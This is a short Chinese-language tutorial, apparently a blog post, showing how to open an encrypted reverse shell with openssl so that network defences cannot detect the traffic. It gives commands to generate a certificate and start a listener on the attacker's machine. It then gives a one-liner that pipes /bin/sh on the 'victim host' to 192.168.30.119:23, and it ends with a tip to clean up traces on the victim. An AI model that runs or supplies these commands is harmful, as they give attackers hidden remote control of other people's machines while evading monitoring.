0x01 简介

使用常规NC或者其他常规的方法反弹shell,由于流量都是明文的,很容易被网络防御设备检测到,因此需要对传输内容进行混淆或者加密。并且几乎每一个https都有openssl库,方便我们使用openssl反弹shell。下面将在linux下进行演示。

0x02 使用openssl反弹加密shell

linux
2.1 生成密钥

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

自生成密钥会提示输入证书信息,如果懒人就可以一路回车。回在本目录下生成文件 key.pem cert.pem
启动监听

openssl s_server -quiet -key key.pem -cert cert.pem -port 23

此时在攻击机23端口上启动了SSL/server服务
2.2 受害主机上反弹加密shell

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.30.119:23 > /tmp/s; rm /tmp/s


tips:
1.需要注意的是,当攻击机断开连接的时候回在受害主机上提示,需要适当清除。

01-05 04:36